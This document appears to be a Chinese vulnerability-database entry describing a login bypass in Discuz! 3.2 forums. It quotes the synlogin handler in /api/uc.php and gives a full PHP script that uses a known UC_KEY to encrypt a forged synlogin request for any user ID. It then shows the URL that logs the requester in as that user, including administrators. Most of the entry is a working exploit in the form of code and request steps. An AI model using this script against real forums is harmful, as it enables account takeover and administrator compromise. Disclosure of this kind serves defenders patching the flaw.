Discuz!3.2 利用UC_KEY登陆任意用户

基本字段

漏洞编号：: SSV-89483

披露/发现时间：: 未知

提交时间：: 2015-09-20

漏洞等级：

漏洞类别：: 登录绕过

影响组件：: Discuz!

漏洞作者：: 未知

提交者：: rainism

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 rainism 共获得 4.4KB

几乎所有版本都可以吧（在得到uc_key情况下）/api/uc.php里面有个synlogin方法<ol><li>function synlogin($get, $post) { </li><li>                global $_G; </li><li> </li><li>                if(!API_SYNLOGIN) { </li><li>                        return API_RETURN_FORBIDDEN; </li><li>                } </li><li> </li><li>                header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"'); </li><li> </li><li>                $cookietime = 31536000; </li><li>                $uid = intval($get['uid']); </li><li>                if(($member = getuserbyuid($uid, 1))) { </li><li>                        dsetcookie('auth', authcode("$member[password]\t$member[uid]", 'ENCODE'), $cookietime); </li><li>                } </li><li>        }</li></ol>只要网上随便找个以前uc_key  getshell的脚本加密一下这个'time='.time().'&action=synlogin&uid=你要登陆的用户的id';<ol><li><?php </li><li>$uc_key="xxxxxx"; </li><li>$a = 'time='.time().'&action=synlogin&uid=1'; </li><li>echo $code=urlencode(_authcode($a, 'ENCODE', $uc_key)); </li><li>function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { </li><li>    $ckey_length = 4; </li><li> </li><li>    $key = md5($key ? $key : UC_KEY); </li><li>    $keya = md5(substr($key, 0, 16)); </li><li>    $keyb = md5(substr($key, 16, 16)); </li><li>    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; </li><li> </li><li>    $cryptkey = $keya.md5($keya.$keyc); </li><li>    $key_length = strlen($cryptkey); </li><li> </li><li>    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; </li><li>    $string_length = strlen($string); </li><li> </li><li>    $result = ''; </li><li>    $box = range(0, 255); </li><li> </li><li>    $rndkey = array(); </li><li>    for($i = 0; $i <= 255; $i++) { </li><li>        $rndkey[$i] = ord($cryptkey[$i % $key_length]); </li><li>    } </li><li> </li><li>    for($j = $i = 0; $i < 256; $i++) { </li><li>        $j = ($j + $box[$i] + $rndkey[$i]) % 256; </li><li>        $tmp = $box[$i]; </li><li>        $box[$i] = $box[$j]; </li><li>        $box[$j] = $tmp; </li><li>    } </li><li> </li><li>    for($a = $j = $i = 0; $i < $string_length; $i++) { </li><li>        $a = ($a + 1) % 256; </li><li>        $j = ($j + $box[$a]) % 256; </li><li>        $tmp = $box[$a]; </li><li>        $box[$a] = $box[$j]; </li><li>        $box[$j] = $tmp; </li><li>        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); </li><li>    } </li><li> </li><li>    if($operation == 'DECODE') { </li><li>        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { </li><li>            return substr($result, 26); </li><li>        } else { </li><li>                return ''; </li><li>            } </li><li>    } else { </li><li>        return $keyc.str_replace('=', '', base64_encode($result)); </li><li>    } </li><li> </li><li>}</li></ol>得到code后直接访问论坛url/api/uc.php?code=你加密后的code,就能登陆了，admin管理员也是可以登陆的